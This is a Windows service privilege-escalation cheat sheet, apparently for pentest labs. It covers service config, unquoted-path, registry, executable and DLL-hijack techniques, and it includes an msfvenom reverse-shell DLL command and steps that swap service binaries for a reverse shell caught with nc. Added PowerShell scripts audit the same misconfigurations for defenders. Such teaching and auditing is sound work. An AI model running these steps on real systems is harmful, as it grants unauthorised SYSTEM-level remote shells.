Services

Introduction

Dealing with services:

# query the service config:
sc.exe qc <name>

# query the current service status:
sc.exe query <name>

# modify a service config option:
sc.exe config <name> <option>= <value>

# service start/stop:
net start/stop <name>

Rabbit hole: even if you can edit service options, make sure you can also start/stop the service (or at least restart the system); otherwise there's nothing you can do with the modified config.

Insecure Service Properties

  1. Use winPEAS to enumerate services and see if any of them are modifiable:
.\winPEASany.exe quiet serviceinfo
  2. Confirm permissions to that service with accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  3. Query the current service config:
  • check the BINARY_PATH_NAME
  • make sure it runs as the system user (SERVICE_START_NAME field)
sc qc <service_name>
  4. Set the binary path of the service to the revshell binary and restart the service:
sc config <service_name> binpath= "\"C:\revshell.exe\""
  5. Start nc on kali
  6. Restart the service:
net stop <service_name>
net start <service_name>
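The accesschk step above asks, for one service, whether a given user holds change-config rights. The following PowerShell script (an added example, not part of the original page or of winPEAS/accesschk) asks the same question for every service at once from the defender's side: it reads each service's security descriptor via `sc.exe sdshow` and reports allow ACEs that grant SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or generic write/all to broad non-administrative principals. The SDDL alias list and the right codes are standard Windows values; the function and variable names are this example's own.

```powershell
# Added example, not from the original page: audit service security descriptors
# for ACEs that let a non-administrative principal reconfigure the service.
# It reads the same SDDL that `sc.exe sdshow <name>` prints and that accesschk
# evaluates. Run elevated so every service's descriptor is readable.

# SDDL right codes that matter for a service: DC = SERVICE_CHANGE_CONFIG
# (rewrite binPath / start account), WD = WRITE_DAC, WO = WRITE_OWNER,
# GA/GW = GENERIC_ALL/GENERIC_WRITE. The numeric mask covers ACEs written as 0x....
$riskyCodes = 'DC', 'WD', 'WO', 'GA', 'GW'
$riskyMask  = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

# Broad, non-administrative principals: SDDL aliases (Everyone, Authenticated
# Users, Users, Interactive, Guests, Anonymous) and their explicit SIDs.
# Note that 'WD' is Everyone in the SID field but WRITE_DAC in the rights field.
$lowPrivSids = 'WD', 'AU', 'BU', 'IU', 'BG', 'AN',
               'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4', 'S-1-5-32-546', 'S-1-5-7'

function Get-RiskyServiceAces {
    param([string]$Name)
    $sddl = (& sc.exe sdshow $Name 2>$null) -join ''
    # Keep only the DACL part (between D: and the optional S: SACL).
    if ($sddl -notmatch 'D:(?<dacl>.*?)(?:S:|$)') { return }
    foreach ($m in [regex]::Matches($Matches.dacl, '\(([^)]*)\)')) {
        # ACE string layout: type;flags;rights;object_guid;inherit_guid;sid
        $f = $m.Groups[1].Value -split ';'
        if ($f.Count -lt 6 -or $f[0] -ne 'A') { continue }   # allow ACEs only
        $rights, $sid = $f[2], $f[5]
        if ($lowPrivSids -notcontains $sid) { continue }
        if ($rights -match '^0x') {
            $hit = ([Convert]::ToInt64($rights.Substring(2), 16) -band $riskyMask) -ne 0
        } else {
            # Rights are a run of two-letter codes, e.g. CCLCSWRPWPDTLOCRRC
            $codes = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $hit = [bool]($codes | Where-Object { $riskyCodes -contains $_ })
        }
        if ($hit) {
            [pscustomobject]@{ Service = $Name; Principal = $sid; Rights = $rights }
        }
    }
}

Get-Service | ForEach-Object { Get-RiskyServiceAces -Name $_.Name } | Format-Table -AutoSize
```

Any row in the output is a service whose definition a standard user can rewrite; the fix is to remove that ACE (for example with `sc.exe sdset` or the System Services policy in Group Policy) rather than to rely on the service's start/stop rights being restricted. The script does not evaluate Deny ACEs or group nesting, so confirm individual hits with accesschk as the page does.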

Unquoted Service Path

  1. Use winPEAS to enumerate services with unquoted paths:
.\winPEASany.exe quiet serviceinfo
  2. Confirm permissions to that service with accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  3. Use accesschk.exe to check if you can write to the unquoted paths of that service:
.\accesschk.exe /accepteula -uwdq "<unquoted_path>" # e.g. "C:\Program Files\"
Look for the entry: RW BUILTIN\Users
  4. Copy your revshell.exe to a location somewhere in the path and rename it to the first part of the unquoted path.
  5. Start nc on kali
  6. Restart the service:
net stop <service_name>
net start <service_name>

Weak Registry Permissions

  1. Use winPEAS to enumerate services for which we can modify registry entries:
.\winPEASany.exe quiet serviceinfo
  2. Verify that with either PowerShell or accesschk:
powershell -exec bypass

Get-Acl <registry_path> | Format-List

# or

.\accesschk.exe /accepteula -uvwqk <registry_path>

Look for RW NT AUTHORITY\INTERACTIVE entries.
  3. Confirm permissions to that service with accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  4. Check the current values in the service registry key:
reg query <registry_path>

Look for ImagePath to update it and make sure the ObjectName contains System.
  5. Override the ImagePath value with the revshell.exe:
reg add <registry_path> /v ImagePath /t REG_EXPAND_SZ /d C:\revshell.exe /f
  6. Start nc on kali
  7. Restart the service:
net stop <service_name>
net start <service_name>
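The Get-Acl / accesschk step above checks one registry key by hand. As an added example (not from the original page and not part of winPEAS or accesschk), the PowerShell below walks every key under HKLM\SYSTEM\CurrentControlSet\Services and reports keys whose ACL grants write rights to low-privilege principals, alongside the ImagePath and ObjectName values that matter for the outcome. The identity list is a fixed set of well-known groups; the function name is this example's own.

```powershell
# Added example, not from the original page: list service registry keys whose
# ACL lets a low-privilege principal change ImagePath or ObjectName. This is
# the condition the accesschk/Get-Acl step looks for, applied to every service
# at once. Run elevated so keys with restrictive ACLs are still readable.

$lowPrivIdentities = 'Everyone', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Users', 'BUILTIN\Guests'

# Registry rights that permit rewriting values or the ACL itself
# (SetValue/CreateSubKey are contained in WriteKey; FullControl contains all).
# The two high bits catch inherit-only ACEs written with generic rights.
$regWriteMask = [int]([System.Security.AccessControl.RegistryRights]::WriteKey -bor
                      [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                      [System.Security.AccessControl.RegistryRights]::TakeOwnership) -bor 0x40000000 -bor 0x10000000

function Find-WeakServiceKeyAcl {
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.RegistryRights -band $regWriteMask) -eq 0) { continue }
            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                ImagePath = $props.ImagePath      # what would be overwritten
                RunsAs    = $props.ObjectName     # LocalSystem means full impact
            }
        }
    }
}

Find-WeakServiceKeyAcl | Format-Table -AutoSize
```

A hit with RunsAs = LocalSystem is the case the page describes; the remediation is to restore the key's inherited ACL (writable only by Administrators and SYSTEM). Deny ACEs and nested group membership are not evaluated, so confirm individual keys with accesschk before acting.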

Insecure Service Executables

  1. Use winPEAS to enumerate services whose executable we can overwrite:
.\winPEASany.exe quiet serviceinfo
  2. Verify this with accesschk:
.\accesschk.exe /accepteula -quvw "<service_executable>"
Look for RW Everyone or your user/group.
  3. Confirm permissions to that service with accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  4. Back up the original service executable
  5. Replace the service executable with your revshell
  6. Start nc on kali
  7. Restart the service:
net stop <service_name>
net start <service_name>

DLL Hijacking

  1. Use winPEAS to enumerate non-Microsoft services and look for a folder that is writable and in the PATH variable:
.\winPEASany.exe quiet serviceinfo
  2. Check which of those services we have privileges to stop/start:
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  3. Check which binary this service is executing and copy it to your environment for analysis.
  4. Use Procmon to check which DLLs are loaded on service start. There should be NAME NOT FOUND entries which show how Windows tries to find and load the DLL from different locations. If we find a location to which we have write access, we can place our malicious DLL there.
  5. Generate a revshell with the format set to dll:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f dll -o <dll_name.dll>
  6. Replace the DLL on the target.
  7. Start nc on kali
  8. Restart the service:
net stop <service_name>
net start <service_name>
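The Unquoted Service Path, Insecure Service Executables and DLL Hijacking sections all come down to one file-system question: can a low-privilege principal create or replace a file in a location a SYSTEM service will load from? The PowerShell below is an added example (not from the original page, winPEAS or accesschk) that answers it in one sweep: it expands unquoted paths into the directories the service controller would probe, resolves each service's executable and checks it and its directory, and checks the machine-wide PATH that services use for DLL resolution. The identity list, the write mask and all function names are this example's own choices.

```powershell
# Added example, not from the original page: one sweep for the three file-system
# conditions described above (unquoted service paths, writable service executables,
# writable directories on the system PATH that services search for DLLs). Uses the
# same ACL data accesschk reads; Deny ACEs and nested group membership are not
# evaluated, so treat hits as candidates to confirm, not as proof.

$lowPrivIdentities = 'Everyone', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Users', 'BUILTIN\Guests'

# File-system rights that allow creating or replacing a file in the location;
# the two high bits catch inherit-only ACEs expressed as generic rights.
$fsWriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                     [System.Security.AccessControl.FileSystemRights]::Delete -bor
                     [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                     [System.Security.AccessControl.FileSystemRights]::TakeOwnership) -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWrite {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPrivIdentities -contains $ace.IdentityReference.Value -and
            ([int]$ace.FileSystemRights -band $fsWriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    # Directories probed for an unquoted path with spaces, e.g.
    # C:\Program Files\My App\svc.exe -> C:\ (Program.exe), C:\Program Files (My.exe), ...
    param([string]$PathName)
    $parts = $PathName -split ' '
    $seen = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $dir = Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
        if ($dir -and $seen -notcontains $dir) { $seen += $dir; $dir }
    }
}

function Get-ServiceExecutable {
    # Quoted path: take the quoted text. Unquoted: longest leading segment naming a file.
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    $parts = $PathName -split ' '
    for ($i = $parts.Count; $i -ge 1; $i--) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
}

function New-Finding {
    param($Service, [string]$Issue, [string]$Path, [string]$RunsAs)
    [pscustomobject]@{ Service = $Service; Issue = $Issue; Path = $Path; RunsAs = $RunsAs }
}

function Find-ServiceFileWeaknesses {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        # 1. Unquoted path containing spaces: every probed directory must be non-writable.
        if ($svc.PathName -notmatch '^"' -and $svc.PathName -match ' ') {
            foreach ($dir in Get-UnquotedPathCandidates $svc.PathName) {
                if (Test-LowPrivWrite $dir) { New-Finding $svc.Name 'UnquotedPathDirWritable' $dir $svc.StartName }
            }
        }
        # 2. The executable itself, or the directory it lives in, is writable.
        $exe = Get-ServiceExecutable $svc.PathName
        if ($exe -and (Test-LowPrivWrite $exe)) { New-Finding $svc.Name 'ExecutableWritable' $exe $svc.StartName }
        elseif ($exe -and (Test-LowPrivWrite (Split-Path $exe -Parent))) { New-Finding $svc.Name 'ExecutableDirWritable' (Split-Path $exe -Parent) $svc.StartName }
    }
    # 3. Services resolve DLLs through the machine-wide PATH, not the caller's session PATH.
    foreach ($dir in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' | Where-Object { $_ })) {
        if (Test-LowPrivWrite $dir) { New-Finding '(all services)' 'PathDirWritable' $dir '' }
    }
}

Find-ServiceFileWeaknesses | Format-Table -AutoSize
```

The fixes map directly onto the Issue column: quote the binary path (`sc.exe config <name> binPath= "\"C:\Program Files\My App\svc.exe\""`), restore Administrators/SYSTEM-only write access on the executable and its directory, and remove user-writable directories from the system PATH. Findings with RunsAs = LocalSystem are the ones the page's procedures would turn into a SYSTEM shell, so triage those first.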